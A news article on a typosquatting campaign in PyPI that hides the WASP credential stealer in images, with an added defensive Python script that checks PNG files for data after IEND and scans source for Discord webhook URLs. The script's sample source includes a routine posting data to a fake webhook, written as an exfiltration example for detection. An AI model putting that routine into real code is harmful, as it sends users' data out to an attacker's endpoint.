This credential stealer is targeting Python developers

Researchers from Checkmarx have discovered more than two dozen malicious packages on PyPI, the main package repository for Python developers, and published their findings in a new report.
These packages are built to look almost identical to legitimate ones, so that a careless developer who mistypes a name or copies the wrong one downloads and installs the malicious package instead, which then delivers the malware.
The technique is called typosquatting and is popular among cybercriminals who specialize in attacking software developers, because a single misspelled dependency is enough to compromise a build.
Information theft
To hide the malware, the attackers combine two techniques: steganography and polymorphism.
Steganography hides data inside another, innocuous-looking file; here it lets the threat actors deliver malicious code inside what appear to be ordinary .JPG and .PNG images, which most scanners do not treat as executable content.
Polymorphic malware, meanwhile, regenerates its payload on each installation so that no two copies share the same bytes, which defeats signature-based antivirus and other tools that rely on matching known samples.
The attackers used these techniques to deliver WASP, an information-stealing tool that collects the victim's Discord account, saved passwords, cryptocurrency wallet data, credit card details, and anything else on the victim's endpoint that the operators deem interesting.
Once collected, the data is sent back to the attackers through a hard-coded Discord webhook URL embedded in the stealer.
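As an added example (written for this article, not code from Checkmarx or from the WASP campaign), two checks a reviewer can run on a downloaded package before installing it: whether a bundled PNG carries extra bytes after its IEND chunk, and whether any source file contains a hard-coded Discord webhook URL. Appending a payload past IEND is one common way of hiding code in an image and is used here as an illustration of the kind of check; it is not a claim about the exact encoding this campaign used. The sample image, hidden payload and source snippet are all constructed inline.

```python
"""Added example: detect data appended after a PNG's IEND chunk and hard-coded
Discord webhook URLs in source text. Constructed for illustration."""
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Discord webhook URLs have a fixed shape: a numeric id followed by a token.
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"
)


def png_trailing_data(data: bytes) -> bytes:
    """Walk the PNG chunk list and return every byte after the IEND chunk.
    A well-formed image returns b''. Raises ValueError for non-PNG or
    truncated input rather than silently reporting 'clean'."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4          # length + type + data + CRC
        if end > len(data):
            raise ValueError("truncated chunk")
        if ctype == b"IEND":
            return data[end:]
        pos = end
    raise ValueError("no IEND chunk found")


def find_discord_webhooks(text: str) -> list:
    """Return every Discord webhook URL found in a source file's text."""
    return WEBHOOK_RE.findall(text)


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk with a correct CRC (used only to construct samples)."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


# Constructed 1x1 RGB image: IHDR, one filtered scanline in IDAT, then IEND.
_ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
_idat = zlib.compress(b"\x00\xff\x00\x00")
CLEAN_PNG = PNG_SIGNATURE + _chunk(b"IHDR", _ihdr) + _chunk(b"IDAT", _idat) + _chunk(b"IEND", b"")

# Constructed stand-in for a hidden second stage; image viewers ignore it.
HIDDEN_PAYLOAD = b"print('hidden stage two')"
STEGO_PNG = CLEAN_PNG + HIDDEN_PAYLOAD

# Constructed source snippet resembling an exfiltration routine (webhook id/token are fake).
SAMPLE_SOURCE = '''
import requests
HOOK = "https://discord.com/api/webhooks/123456789012345678/AbCdEf-ghIJ_klMNop"
def send(data):
    requests.post(HOOK, json={"content": data})
'''

if __name__ == "__main__":
    print("clean image trailing bytes:", len(png_trailing_data(CLEAN_PNG)))
    print("stego image trailing bytes:", png_trailing_data(STEGO_PNG))
    print("webhooks in source:", find_discord_webhooks(SAMPLE_SOURCE))
```

Neither check is a substitute for reading the package's `setup.py` and any code run at import time, but both are cheap to run over every file in a wheel or sdist, and a webhook URL in an installer script has no legitimate reason to be there.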
The campaign also appears to serve as marketing: the researchers spotted the operators advertising the tool on the dark web for $20 and claiming it is currently undetectable.
The researchers further believe this is the same group behind a similar attack first reported earlier this month by researchers at Phylum and Checkmarx. Earlier reporting had also described a group tracked as Worok distributing DropBoxControl, a custom .NET C# credential stealer that abuses the Dropbox file storage service for command-and-control communication and data theft, since at least September 2022.
Judging by its toolkit, the researchers believe Worok is a cyber-espionage group that operates quietly, preferring to move laterally through target networks and exfiltrate sensitive data. It also appears to rely on its own proprietary tools, as the researchers have not observed them in use by anyone else.
Via: The Register